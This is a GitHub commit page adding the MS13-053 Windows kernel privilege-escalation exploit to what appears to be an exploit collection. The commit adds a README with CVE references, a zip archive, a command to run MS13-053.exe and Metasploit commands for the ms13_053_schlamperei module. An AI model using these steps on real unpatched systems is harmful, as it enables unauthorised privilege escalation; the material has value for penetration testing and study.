Skip to content

Commit 1fa2d22

Browse files
committed
MS13-053
1 parent bc41714 commit 1fa2d22

File tree

3 files changed

+39
-0
lines changed

3 files changed

+39
-0
lines changed

MS13-053/2003.png

38.2 KB
Loading

MS13-053/MS13-053-KB2850851.zip

28 KB
Binary file not shown.

MS13-053/README.md

Lines changed: 39 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,39 @@
1+
# MS13-053
2+
```
3+
win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3,
4+
Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 does not properly handle objects in memory,
5+
which allows local users to gain privileges via a crafted application, aka "Win32k Information Disclosure Vulnerability."
6+
```
7+
8+
Vulnerability reference:
9+
* [MS13-053](https://technet.microsoft.com/library/security/ms13-053)
10+
* [CVE-2013-1300](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1300)
11+
* [CVE-2013-1340](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1340)
12+
* [CVE-2013-1345](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1345)
13+
* [CVE-2013-3129](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3129)
14+
* [CVE-2013-3167](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3167)
15+
* [CVE-2013-3172](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3172)
16+
* [CVE-2013-3173](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3173)
17+
* [CVE-2013-3660](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3660)
18+
19+
## Usage
20+
```
21+
c:\> MS13-053.exe
22+
```
23+
![2003](2003.png)
24+
25+
## load the module within the Metasploit
26+
[msf](https://www.rapid7.com/db/modules/exploit/windows/local/ms13_053_schlamperei)
27+
```
28+
msf > use exploit/windows/local/ms13_053_schlamperei
29+
msf exploit(ms13_053_schlamperei) > show targets
30+
...targets...
31+
msf exploit(ms13_053_schlamperei) > set TARGET <target-id>
32+
msf exploit(ms13_053_schlamperei) > show options
33+
...show and set options...
34+
msf exploit(ms13_053_schlamperei) > exploit
35+
```
36+
37+
## References
38+
* [Adobe, Microsoft Release Critical Updates](https://krebsonsecurity.com/tag/ms13-053/)
39+
* [ms13_053_schlamperei.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms13_053_schlamperei.rb)

0 commit comments

Comments
 (0)